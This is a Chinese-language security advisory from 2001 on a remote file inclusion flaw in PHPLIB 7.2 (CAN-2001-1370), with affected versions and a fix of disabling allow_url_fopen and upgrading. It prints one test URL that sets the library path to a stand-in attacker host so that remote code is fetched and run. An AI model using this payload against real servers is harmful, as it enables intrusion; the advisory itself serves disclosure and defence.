发布日期：2001-07-21
更新日期：2001-07-27

受影响系统：

PHPLib Team PHPLIB 7.2.1
PHPLib Team PHPLIB 7.2c
PHPLib Team PHPLIB 7.2b
PHPLib Team PHPLIB 7.2
   - Trustix Secure Linux 1.5
   - Trustix Secure Linux 1.2
   - Trustix Secure Linux 1.1
   - Horde Imp 2.2.5
   - Horde Imp 2.2.4
   - Horde Imp 2.2.3
   - Horde IMP 2.2.2
   - Horde IMP 2.2.1
   - Horde IMP 2.2
   - Horde IMP 2.0

不受影响系统：

PHPLib Team PHPLIB 7.2d

描述：

---

BUGTRAQ  ID: 3079
CVE(CAN) ID: CAN-2001-1370

PHPLIB是一个面向开发者，广泛使用，支持Web应用程序中的Session管理的代码库，因
此应用程序可以很方便地使用它。

PHPLIB存在一个安全问题，攻击者可能通过提交一个恶意的请求，导致应用程序去其它
的主机上获取脚本并且执行。

利用这个漏洞，攻击者可以获得对Web服务器的本地访问权。

<*来源：giancarlo pinerolo (giancarlo@navigare.net) *>




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

giancarlo pinerolo (giancarlo@navigare.net)提供了如下测试代码：

http://victim.com/any/phplib/page.php?_PHPLIB[libdir]=http://attacker.com/




建议：

---

临时解决方法：

Anil Madhavapeddy （anil@recoil.org）提供了如下临时解决方法：

编辑php.ini，把“allow_url_fopen = On”改为“allow_url_fopen = Off”

厂商补丁：

目前好几家厂商已经发布了PHPLIB新版本：

http://www.horde.org/
http://phplib.netuse.de/index.php3



浏览次数：5104
严重程度：0（网友投票）